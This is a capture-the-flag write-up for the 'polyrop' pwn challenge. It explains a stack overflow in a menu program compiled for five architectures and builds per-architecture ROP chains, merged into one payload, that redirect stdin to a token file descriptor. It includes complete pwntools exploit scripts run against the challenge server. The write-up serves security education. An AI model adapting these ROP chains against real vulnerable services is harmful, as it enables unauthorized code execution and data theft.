I picked the wrong path at Cyber Security Rumble 2024’s polypwn challenge and failed. Can you do it with more time and a win function? NOTE: Knowledge of polypwn is not required! Credit to @LevitatingLion for the original challenge and part of the code.

Category: pwn

Solver: nh1729

Flag: GPNCTF{you_re_lucky_that_i_scr4pped_one_arch_11dda4}

Writeup

Challenge Setup

This is the hard version of polyrop-warmup. To summarize:

It is a binary exploitation challenge. We get the source of the program to pwn composer.c and a python wrapper composer.py. The program prints a menu to either echo back a line or exit. The program has been compiled for 5 different architectures: s390x, aarch64, arm, riscv64 and x86_64.

$ pwn checksec composer-*
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-aarch64'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-arm'
    Arch:     arm-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-riscv64'
    Arch:     riscv64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-s390x'
    Arch:     em_s390-64-big
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-x86_64'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

The wrapper starts a QEMU instance with the executable for each arcitecture under a different user. Every line we send is multiplexed to every of these processes. The wrapper then waits for all processes to output something, prints these outputs and accepts new input.

QEMU loads all binaries except the one for aarch64 at static addresses, despite them being PIE.

The flag can be obtained from the wrapper under a specific condition: Every architecture receives an in-memory file on file descriptor 42. These files contain random tokens and if we submit all of these tokens to the wrapper, it prints the flag.

Therefore, we want to make all binaries of the program read from file descriptor 42 and print the result back to us.

In contrast to polyrop-warmup, there is no win function. We have to do proper ROP this time.

Recall there is a buffer overflow in the function that echoes back a user provided line:

static void add_composer(void) {
    char buf[0x20];
    puts("enter composer:");
    int i = 0, c;
    while ((c = xgetchar()) != '\n') {
        buf[i++] = c;
    }
    fputs("composer: ", stdout);
    puts(buf);
    // TODO: add composer to db
}

The while loop behaves almost exactly like the unsafe gets function, except that xgetchar is a custom function that exits on EOF.

Solution

We started with our exploit for polyrop-warmup. Since we need to build proper ROP chains this time, we debug each architecture individually. For that, we patch the list of architectures in composer.py and our exploit to include only one and enable gdb debugging in composer.py.

We can debug the architecture now by running gdb-multiarch with the command

target remote localhost:1234

The first architecture we tackled was aarch64.

aarch64

Architecture basics: This architecture stores the return address not on the stack but in register x30. Only if a function calls other functions and thus has to destroy x30, it is saved on the stack. The stack pointer itself is x29.

First, we automatically search for gadgets and dump all assembly with

ROPgadget --binary composer-aarch64 --offset 0x100000 > gadgets-aarch64.txt # offset is the one Ghidra uses
aarch64-linux-gnu-objdump -d composer-aarch64  > disassembly-aarch64.txt # more searchable than Ghidra 

The objdump command is from the binutils-aarch64-linux-gnu package.

We can see that the binary uses statically compiled musl as libc. We therefore did not need to leak further addresses for juicy gadgets from there. Instead, we looked for somewhat high-level ones to increase the chances of reuse on other architectures.

To read from file descriptor 42, our first attempt was to use add_composer by setting the pointer it writes to the address of the file descriptor in the stdin struct. After that, we could input the byte 42 ('*') to change the file descriptor. Subsequently, the function would read the token from the new file descriptor.

First, we needed to leak the address of the binary. This is only required for aarch64 due to QEMU. Easy enough, we copied that from our exploit for polyrop-warmup.

The exploit approach however failed, because add_composer calls exit on EOF. We could thus not return to any gadget to print the data.

The next approach was to use other gadgets to change the file descriptor and read from it as discrete operations. Using some regexes on the output of ROPGadget, we found these gadgets:

# loads w0 and x19 from the stack
<__uflow + 0x34>: ldrbw0, [sp, #47]; ldrx19, [sp, #16]; ldpx29, x30, [sp], #48; ret

# stores the value of w0 to an address relative to x19
<__do_global_dtors_aux + 0x50>: strb w0, [x19, #1072]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #32; ret

To find required offsets for the registers and next return addresses, we ran the program with the payload filled with a cyclic pattern (default), stepped through the execution until we were at the gadgets and just like with the return addresses, got the offsets by finding the register values in cyclic.

aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4

aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']

# pwndbg> p &__stdin_FILE.fd
# $3 = (int *) 0x7f112a8d82c0 <__stdin_FILE+120>
aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0

payload = flat({
    # Change fd of stdin to 42
    0x28: aarch_exe.sym['__uflow'] + 0x34, # load w0, x19
    0x60+0x2f: bytes([42]), # value for w0
    0x70: aarch_stdin_fd - 0x430, # value for x19
    aarch_rop_offset+0x68: aarch_exe.symbols['main'] - 0x44, # store w0 at x19 + 0x430; load x19
}, length=0x500, word_size=64, endian='little', filler=cyclic())

With print __stdin_FILE, we confirmed the fd was changed.

We cannot use add_composer to read from that file descriptor because it would exit again. Therefore we tried to find gadgets to explicitly call getchar and store the result in some buffer to print later. Unfortuately, getchar on this architecture does not seem to store its return address on the stack.

If we return to it by setting register 0x30, the ret of the function will jump back to the top, trapping us in an infinite loop of getchar with no option to output our precious tokens. We would like to have a gadget that does a proper function call to a register address instead so it sets up 0x30 properly. In searching for these with the regex \tb.*\tx, we found an even better one:

// __libc_start_init + 0x2c
// Start of interesting bit
ldr	x0, [x19], #8
blr	x0
cmp	x19, x20
b.cc	10cf0 // Jump to start of this gadget
// End of interesting bit
ldp	x19, x20, [sp, #16]
ldp	x29, x30, [sp], #32
ret

The interesting bit loops from x19 to x20 and calls each address in that array as a function. Extremely interesting, as we know we can set up x19 easily (and x20 is not much harder). This single gadget lets us build a “ROP”-chain that does not actually use the return address register x30 to set up the gadgets. Instead, we can simply create an array of addresses to be called. Some of these functions would be getchar, while others would store the return value in w0 to a chosen buffer. While searching for such a gadget, we realized it might not be necessary at all because the characters read in getchar would also appear in the input buffer of __stdin_FILE.

# Address start of payload
aarch_stack_base = 0x4000007ff150 # Emperical
aarch_array_offset = 0xb0

payload = flat({
# Change fd of stdin to 42
    0x28: aarch_exe.sym['__uflow'] + 0x34, # ldrb w0, [sp, #47]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #48; ret
    0x60+0x2f: bytes([42]), # value for w0
    0x70: aarch_stdin_fd - 0x430, # value for x19

    # Fetch token and print it.
    0x68: aarch_exe.symbols['main'] - 0x44, # strb w0, [x19, #0x430] ; ldr x19, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; ret
    0xa0: aarch_stack_base + aarch_rop_offset+aarch_array_offset, # value for x19: start of list of functions
    0x50: aarch_stack_base + aarch_rop_offset+aarch_array_offset + 0x10, # value for x20: end of list of functions
    0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin

    0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions

    aarch_array_offset: [aarch_exe.symbols['getchar']] * 16, # functions to execute: read token
}, length=0x500, word_size=64, endian='little', filler=cyclic())

Stepping through the exploit, we found that the first getchar already reads the entire token into __stdin_FILE.buf. We therefore do not need to call it 16 times. Although at this point it would be fine and safer to make 16 calls, it bloats up our payload with a huge chunk of offsets used. That could complicate things further down the line when we need all payloads to be non-overlapping to combine them for the final payload. So one getchar it is.

The next step is to print __stdin_FILE.buf. Luckily, we found a gadget in main that puts the buffer from register x22:

// main+0xa8
mov	x0, x22
b	10a5c <main+0x78>
// instruction after jump:
bl	11718 <puts>

main restores x22 from the stack when returning, giving us full control over it.

The entire exploit for aarch64 is this:

from pwn import *
from ast import literal_eval

archs = ["aarch64"]
r = process('python ./composer.py', shell=True)

def read_response(r):
    out = {}
    for a in archs:
        r.recvuntil(f'{a}: '.encode())
        result : bytes = literal_eval(r.recvline().decode())
        out[a] = result
    return out
read_response(r)
r.sendline(b'1')
read_response(r)
r.sendline(b'A' * 0x28)
A = read_response(r)

aarch_leak = int.from_bytes(A['aarch64'][len(b'composer: ') + 0x28:-1], 'little')
aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4

aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']

aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0

# Address start of payload
aarch_stack_base = 0x4000007ff150 # Emperical
aarch_array_offset = 0xb0

payload = flat({
    # Change fd of stdin to 42
    0x28: aarch_exe.sym['__uflow'] + 0x34, # load w0, x19
    0x60+0x2f: bytes([42]), # value for w0
    0x70: aarch_stdin_fd - 0x430, # value for x19
    0x68: aarch_exe.symbols['main'] - 0x44, # store w0 at x19 + 0x430; load x19 (anonymous function)

    # Fetch token
    0xa0: aarch_stack_base + aarch_array_offset, # value for x19: start of list of functions
    0x50: aarch_stack_base + aarch_array_offset + 0x10, # value for x20: end of list of functions
    0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin.
    0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions

    aarch_array_offset: [aarch_exe.symbols['getchar'], aarch_exe.symbols['main'] + 0xa8], # functions to execute: prefetch token, go to main for puts
}, length=0x500, word_size=64, endian='little', filler=cyclic())

assert b'\n' not in payload

# send payload
r.sendline(b'1')
read_response(r)
r.sendline(payload)
read_response(r)

# return from main to trigger chain
r.sendline(b'2')
r.interactive()

We can see the token is being printed, together with more garbage from the payload that is still in the buffer.

$ python aarch64_wu.py 
[+] Starting local process '/bin/sh': pid 1284212
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-aarch64'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Switching to interactive mode
aarch64: b'e4e4da8d190bb079kaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaam\n'

Other architectures

One we had one payload figured out, the others were a lot easier as many similar gadgets are available in the same functions. In this section, we only point out notable features, techniques and gadgets for these architectures and do not cover every detail again. You’ll see in the final exploit script that there is a lot of approximate repetition.

On all architectures, we have the strategy to change __stdin_FILE.fd, call getchar and print __stdin_FILE.buf. Since the payloads are conceptually all the same, we only list them in the final, complete exploit script.

ARM

For arm, ROPGadget found only 61 gadgets while the disassembly from objdump was much more useful. Unlike aarch64, arm pops the return address from the stack. The syntax is slightly unusual as it uses a single instruction, ldmia.w, to pop many registers at the end of a function, including the program counter as if it was a regular register. This is the return instruction at the end of main:

pop	{r4, r5, r6, r7, r8, r9, fp, pc}

Working on this architecture, we found this gadget to set the fp, where ld* is load from address with offset and st* is store:

// __fwritex+0x70
ldr	r3, [r5, #20]
add	r3, r4
str	r3, [r5, #20]
ldmia.w	sp!, {r4, r5, r6, r7, r8, pc}

No only does it change a value relative to r5 by r4, it also gives us a ldmia to set both of them! We had them set from the return of main in the end, but this gadget is still really powerful as the function is likely to use callee-saved registers in other architectures too.

The remainder of the payload for arm is almost identical to that of aarch64. We again used libc_start_init to call getchar and a puts from main, although classical ROP could have been sufficient as the return address is on the stack.

s390x

ROPGadget and Ghidra do not support it but objdump is fine. The return address is in register r14 and the stack pointer in r15, all numbers are in big endian. The return address is not always put on the stack. Other than that, we pretty much used the same gadgets as in arm. Popping from the stack is really cursed in this architecture. Most functions use lmg (LOAD MULTIPLE) at the end. The manual explains that this instruction pops all registers from one operand to another. It took us some attempts to understand this so here is an example:

lmg	%r12,%r15,288(%r15)
// This instruction effectively means:
r12 = *(r15+288+8*0)
r13 = *(r15+288+8*1)
r14 = *(r15+288+8*2)
r15 = *(r15+288+8*3)

The only notable differences in gadgets to arm are that for the gadget in __fwritex, we only use the store part as we can control the value to be stored directly, and we set up the first argument register directly and return to puts as second element of the array of functions.

RISCv64

The return address is stored on the stack. The gadgets are the same as in arm.

X86_64

We are comfortable enough with this architecture to pop registers rax and rbx directly and use a simple mov %rax,0x20(%rbx); add 0x10,%rsp; pop %rbx; ret to set fd and use only stack-based return addresses to call all other essential gadgets, without need for the libc_start_init array.

Putting it all together

Now that we had five payloads that worked on their respective architecture, we still had to combine them into a single payload to solve all at the same time. Since for that purpose the ROP chains must not overlap, we chose to use simple gadgets that add some value to the stack pointer or, in the case of s390x directly pop it, to move the actual payload back for each architecture until it does not collide anymore with the other payloads.

These shifts are the ${ARCH}_rop_offset variables in the exploit below.

We used this snippet to merge the payloads, gather tokens and find the flag. We fill the finished payloads with null bytes and consider a byte relevant to a payload if it is not null.


##########################
##### Merge Payloads #####
##########################

payloads = [
    ('arm', payload_arm),
    ('aarch64', payload_aarch64),
    ('riscv', payload_riscv),
    ('x86_64', payload_x86_64),
    ('s390x', payload_s390x),
]

def key(name_payload):
    return len(name_payload[1])

maxlen = key(max(payloads, key=key))

for (name, payload) in payloads:
    assert b'\n' not in payload, f'Payload for {name} has newlines!'

merged_payload = [0] * maxlen

for i in range(maxlen):
    candidates = {}
    for (name, payload) in payloads:
        if len(payload) > i and  payload[i] != 0:
            candidates[name] = payload[i]
    if len(candidates) > 1:
        error(f'Payloads {list(candidates.keys())} overlap at 0x{i:x}!!!', ', '.join(candidates))
    elif len(candidates) == 1:
        merged_payload[i] = candidates.popitem()[1]

for (name, payload) in payloads:
    info(f'{name:10} ' + ''.join(['X' if payload[i:i+8] != bytes(8) else '_' for i in range(0, len(payload), 8)]))

merged_payload = bytes(merged_payload)

###################
##### Exploit #####
###################

r.sendline(b'1')
read_response(r)
r.sendline(bytes(merged_payload))
read_response(r)
r.sendline(b'2')

tokens_raw = read_response(r)

for arch, token in tokens_raw.items():
    success(f'Token for {arch}: {token}')

r.sendline(b'magic word')
for a in archs:
    r.sendline(tokens_raw[a][:16])

r.interactive()

One final hiccup was that on the remote, the stack pointers are randomized while they were constant on local. We fixed that by extending our leaks at the beginning of the exploits.

Useful resources

Exploit

from pwn import *
from ast import literal_eval

archs = ["s390x", "aarch64", "arm", "riscv64", "x86_64"]
r = remote("imagine--john-lennon-5061.ctf.kitctf.de", "443", ssl=True)


def read_response(r):
    out = {}
    for a in archs:
        r.recvuntil(f'{a}: '.encode())
        result : bytes = literal_eval(r.recvline().decode())
        out[a] = result
    return out

######### Begin Leak test

# Leak test
# print(read_response(r))
# for i in range(0x10, 0x70, 4):
#     print(f'##### {i=:x} #####')
#     r.sendline(b'1')
#     read_response(r)
#     r.sendline(b'A' * i)
#     print(read_response(r)['s390x'])
# r.interactive()

######### End Leak test

leaks = {a: bytes(0x20) for a in archs}
len_composer = len(b'composer: ')

read_response(r)

with log.progress("Leaking bytes") as prog:
    for i in range(0x20, 0x70):
        prog.status(f'{i=} / {0x70}')
        r.sendline(b'1')
        read_response(r)
        r.sendline(b'A' * i)
        leaks_ = read_response(r)
        for arch, leak in leaks_.items():
            leak_byte = leak[len_composer+i:][:1]
            if leak_byte == b'\n':
                leaks[arch] += b'\0'
            else:
                leaks[arch] += leak_byte

s390x_stack_base = int.from_bytes(leaks['s390x'][0x68:0x68 + 8].rstrip(b'\n'), 'big') - 0x210
aarch_stack_base = int.from_bytes(leaks['aarch64'][0x20:0x20 + 8].rstrip(b'\n'), 'little') - 0x60
arm_stack_base = int.from_bytes(leaks['arm'][0x24:0x24 + 4].rstrip(b'\n'), 'little') - 0x74
riscv64_stack_base = int.from_bytes(leaks['riscv64'][0x58: 0x58 + 8].rstrip(b'\n'), 'little') - 0xb0

# We do not need a leak for x86_64
success(f'{s390x_stack_base:=x}, {aarch_stack_base:=x}, {arm_stack_base:=x}, {riscv64_stack_base:=x}')

###################
##### AARCH64 #####
###################

aarch_leak = int.from_bytes(leaks['aarch64'][0x28:0x30], 'little')
aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4

aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']

aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0

aarch_offset_jumps = 7
aarch_rop_offset = 0x60 * aarch_offset_jumps

# Offset of function array from buffer start
aarch_array_offset = 0xb0

payload_aarch64 = flat({
    # gdb: b *main+0xfc

    # add 0x60 to sp per iteration
    **{
        0x28 + 0x60 * i: aarch_exe.sym['main'] + 0xe4 for i in range(aarch_offset_jumps)
    },

    aarch_rop_offset: {
        # Change fd of stdin to 42
        # ldrb w0, [sp, #47]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #48; ret
        0x28: aarch_exe.sym['__uflow'] + 0x34,
        0x60+0x2f: bytes([42]), # value for w0
        0x70: aarch_stdin_fd - 0x430, # value for x19

        # Fetch token and puts it.
        # strb w0, [x19, #0x430] ; ldr x19, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; ret
        0x68: aarch_exe.symbols['main'] - 0x44,
        # value for x19: start of list of functions
        0xa0: aarch_stack_base + aarch_rop_offset+aarch_array_offset,
        # value for x20: end of list of functions
        0x50: aarch_stack_base + aarch_rop_offset+aarch_array_offset + 0x10,
        0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin

        0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions

        aarch_array_offset: [
            aarch_exe.symbols['getchar'], # prefetch token
            aarch_exe.symbols['main'] + 0xa8, # puts( x22 )
        ],
    }
}, word_size=64, endian='little', filler=b'\0')

###############
##### ARM #####
###############

arm_exe = ELF('./composer-arm')
arm_exe.address = 0x400000

arm_array_offset = 0x0
arm_stdin_fd = 0x431d6c
arm_stdin_buf = 0x431fac
arm_offset_jumps = 3
arm_rop_offset = 0xc8 * arm_offset_jumps

payload_arm = flat({
    # gdb: b *main+0xdc
    **{
        0x3c + 0xc8 * i: arm_exe.sym['__init_libc'] + 0x11e for i in range(arm_offset_jumps)
    },
    arm_rop_offset: {
        0x2c: 42, # R4
        0x30: arm_stdin_fd - 0x14, # R5
        # 0x28: 0, # R6
        # 0x2c: 0, # R7
        # 0x30: 0, # R8
        # 0x34: 0, # R9
        # 0x38: 0, # R11
        # pc # ldr r3, [r5, #20]; add r3, r4; str r3, [r5, #20]; ldmia.w sp!, {r4, r5, r6, r7, r8, pc}
        0x3c: arm_exe.sym['__fwritex'] + 0x70,

        0x40: arm_rop_offset + arm_array_offset + arm_stack_base, # R4, start of function array
        0x44: arm_rop_offset + arm_array_offset + arm_stack_base + 4 * 2, # R5, end of function array
        # 0x48: 0, # R6
        # 0x4c: 0, # R7
        0x50: arm_stdin_buf, # R8, stdin buffer
        0x54: arm_exe.sym['libc_start_init'] + 0x14, # pc # call function array

        arm_array_offset: [
            arm_exe.sym['getchar'], # prefetch token
            arm_exe.sym['main'] + 0xa4, # puts( R8 )
        ],
    },
}, word_size=32, endian='little', filler=b'\0')

##################
##### x86_64 #####
##################

x86_64_exe = ELF('./composer-x86_64')
x86_64_exe.address = 0x555555556000
x86_64_stdin_fd = 0x55555555ab78
x86_64_stdin_buf = 0x55555555ab78
x86_64_offset_jumps = 3
x86_64_rop_offset = 0x160 * x86_64_offset_jumps

pop_rax = x86_64_exe.sym['_init'] + 1
pop_rbx = x86_64_exe.sym['__init_tp'] + 0x78
# 0x0000000000101e14 : mov dword ptr [rbx + 0x20], eax ; add rsp, 0x10 ; pop rbx ; ret
mov_gadget = x86_64_exe.sym['static_init_tls'] + 0x1cd

payload_x86_64 = flat({
    # gdb: b *main + 0xe7
    **{
        # add rsp, 0x158 ; ret
        0x58 + 0x160 * i: x86_64_exe.sym['__init_libc'] + 0x199 for i in range(x86_64_offset_jumps)
    },
    0x48: 0x55555555afa8, # r15: stdin buffer
    x86_64_rop_offset + 0x58: [
        pop_rax,
        42, # RAX
        pop_rbx,
        x86_64_stdin_fd - 0x20, # rbx
        mov_gadget,
        0, 0, # add rsp, 0x10
        0, # RBX
        x86_64_exe.sym['getchar'],
        x86_64_exe.sym['main'] + 0x63, # mov rdi, r15; call puts
    ]
}, word_size=64, endian='little', filler=b'\0')


#################
##### s390x #####
#################

s390x_exe = ELF('./composer-s390x')
s390x_exe.address = 0x2aa00000000
s390x_stdin_fd = 0x2aa00004090
s390x_stdin_buf = 0x2aa000042c0
s390x_rop_offset = 0x380


payload_s390x = flat({
    # gdb: b *main+0x8c
    # R14, pop registers # lmg %r9,%r15,232(%r15); br %r14
    0x90: s390x_exe.sym['__libc_start_init'] + 0x96,
    0x98: s390x_stack_base + s390x_rop_offset - 0xe8, # R15, saved stack pointer

    s390x_rop_offset: {
        0x8: s390x_stdin_fd - 40 - 4, # R10
        0x10: 42, # R11
        # R14 # stg %r11,40(%r10); lmg %r8,%r15,224(%r15); br %r14
        0x28: s390x_exe.sym['__fwritex'] + 0x122,
        # R15, offsets are such that payload is compact
        0x30: s390x_stack_base + s390x_rop_offset - 0x80,

        0x60: s390x_stdin_buf, # R8
        0x70: s390x_stack_base-0x100, # R10, needs to be read/writeable for this gadget
        0x78: s390x_stack_base + s390x_rop_offset + 0xb0, # R11, begin of function array
        0x90: s390x_exe.sym['__libc_start_init'] + 0x6c, # R14, call function array
        0x98: s390x_stack_base + s390x_rop_offset + 0xb0 - 0xf0, # R15 (stack pointer)

        0xb0: [
            s390x_exe.sym['getchar'],
            s390x_exe.sym['__fwritex'] + 0x118,
        ],

        0xd0: s390x_exe.sym['puts'], # R14
        0xd8: s390x_stack_base + s390x_rop_offset, # R15
    },
}, word_size=64, endian='big', filler=b'\0')


###################
##### riscv64 #####
###################

riscv64_exe = ELF('./composer-riscv64')
riscv64_exe.address = 0x555555556000
riscv64_stdin_fd = 0x555555559090
riscv64_stdin_buf = 0x555555559368
riscv64_array_offset = 0xb0

riscv64_offset_jumps = 3
riscv64_rop_offset = 0x80 * riscv64_offset_jumps

payload_riscv = flat({
    # gdb: b *main+0xe8
    **{
        # addi sp,sp,128; ret
        0x70 + 0x80 * i: riscv64_exe.sym['main'] + 0xce for i in range(riscv64_offset_jumps)
    },

    riscv64_rop_offset: {
        # 0x20: 0, # s9
        # 0x28: 0, # s8
        # 0x30: 0, # s7
        # 0x38: 0, # s6
        0x40: riscv64_stdin_buf, # s5, buffer for puts
        # 0x48: 0, # s4
        # 0x50: 0, # s3
        0x58: riscv64_stdin_fd - 0x28, # s2, file descriptor address
        # 0x60: 0, # s1
        0x68: 42, # FP (s0), file descriptor
        # ra # ld a5,40(s2); mv a0,s3; add a5,a5,s0; sd a5,40(s2)
        0x70: riscv64_exe.sym['__fwritex'] + 0x8c,

        # s0, start of function array
        0x98: riscv64_rop_offset + riscv64_stack_base + riscv64_array_offset,
        # s0, end of function array
        0x90: riscv64_rop_offset + riscv64_stack_base + riscv64_array_offset + 0x10,
        0xa0: riscv64_exe.sym['__libc_start_init'] + 0x24, # call function array
        riscv64_array_offset: [
            riscv64_exe.sym['getchar'],
            riscv64_exe.sym['main'] + 0x7c, # puts ( s5 )
        ],
    },
}, word_size=64, endian='little',filler=b'\0')


##########################
##### Merge Payloads #####
##########################

payloads = [
    ('arm', payload_arm),
    ('aarch64', payload_aarch64),
    ('riscv', payload_riscv),
    ('x86_64', payload_x86_64),
    ('s390x', payload_s390x),
]

def key(name_payload):
    return len(name_payload[1])

maxlen = key(max(payloads, key=key))

for (name, payload) in payloads:
    assert b'\n' not in payload, f'Payload for {name} has newlines!'

merged_payload = [0] * maxlen

for i in range(maxlen):
    candidates = {}
    for (name, payload) in payloads:
        if len(payload) > i and  payload[i] != 0:
            candidates[name] = payload[i]
    if len(candidates) > 1:
        error(f'Payloads {list(candidates.keys())} overlap at 0x{i:x}!!!', ', '.join(candidates))
    elif len(candidates) == 1:
        merged_payload[i] = candidates.popitem()[1]

for (name, payload) in payloads:
    info(f'{name:10} ' + ''.join(['X' if payload[i:i+8] != bytes(8) else '_' for i in range(0, len(payload), 8)]))

merged_payload = bytes(merged_payload)

###################
##### Exploit #####
###################

r.sendline(b'1')
read_response(r)
r.sendline(bytes(merged_payload))
read_response(r)
r.sendline(b'2')

tokens_raw = read_response(r)

for arch, token in tokens_raw.items():
    success(f'Token for {arch}: {token}')

r.sendline(b'magic word')
for a in archs:
    r.sendline(tokens_raw[a][:16])

r.interactive()